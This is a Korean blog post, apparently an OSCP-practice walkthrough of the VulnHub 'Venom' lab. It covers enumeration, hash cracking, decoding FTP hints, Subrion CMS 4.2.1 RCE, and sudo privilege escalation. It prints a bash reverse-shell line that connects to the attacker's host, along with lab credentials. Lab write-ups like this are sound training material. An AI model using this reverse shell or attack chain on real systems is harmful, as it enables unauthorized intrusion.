1.Information Gathering

 

 

- enum4linux

 

nathan / hostinger

다 뒤져보고 다 해봤지만

소득 없음!

 

이럴 땐

 

 

- 소스 확인

 

: 5f2a66f947fa5690c26506f66bde5c23

 

 

- 해시 타입 확인

 

 

 

- 복호화

 

: hostinger

 

 

 

- ftp 로그인

 

: 힌트도 받고 업로드도 되고!

 

 

- 힌트 확인

 

: hostinger가 salt key 인가?

: WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0=

: aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=

: dora password

: venom.box

: L7f9l8@J#p%Ue+Q1234 - 디코드 시 어드민 비번

 

> dora가 admin이고 이 친구 비번이 암호화되어 저장되었다는 듯

 

 

 

 

- 우선 /etc/hosts

 

 

 

- 붙어보면

 

 

Subrion CMS v4.2.1

https://www.exploit-db.com/exploits/49876

 

복호화 후 dora 유저로 로그인해 본다.

 

 

 


 

 

2. Exploitation

 

 

- 디코딩

 

 

풀이해 보면

* You need to follow the 'hostinger' on WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= also aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=

 

* You need to follow the "hostinger" on 'standard vigenere cipher'

also https://cryptii.com/pipes/vigenere-cipher

 

 

 

- 복호화

 

 

 

- 로그인

 

I'm in!

- Link 들어가 실행해 보면

 

RCE 가능!

 

 

- 리스너 기동 후 붙어주면

 

침투 성공!

 

 

# 과정을 생략했지만

요약하면

 

1) kali에서 bash 쉘 실행 파일 생성 후

#!/bin/bash

bash -i >&/dev/tcp/192.168.10.105/443 0>&1

 

2) 칼리에서 파이썬 웹 서버 기동해 주고

RCE를 통해 파일 받고 실행 권한 주고

실행하면 됨!

 

 

upload 경로에 바로 올라간 걸 보니

RCE 스크립트가 아니라 쉘을 바로

올렸어도 되었을 듯!

 

 

 


 

 

3. Privilege Escalation

 

hostinger 사용자로 업!

 

 

- .bash_history 뒤져보고

 

: 힌트대로 찾아 해본다.

 

 

- nathan?

 

nathan!

 

 

- sudo -l?

 

빈수 빼고 다?

 

 

- root 비번 변경 후

 

root!

 

728x90
반응형

'OSCP > Vulnahub' 카테고리의 다른 글

[+] Keyring  (0) 2023.01.22
[+] Election  (0) 2023.01.22
[+] DigitalWorld.local : FALL (SSH id_rsa)  (0) 2023.01.21
[+] WinterMute (Pivoting - 중요)*  (0) 2023.01.21
[+] Hack Me Please  (0) 2023.01.20

+ Recent posts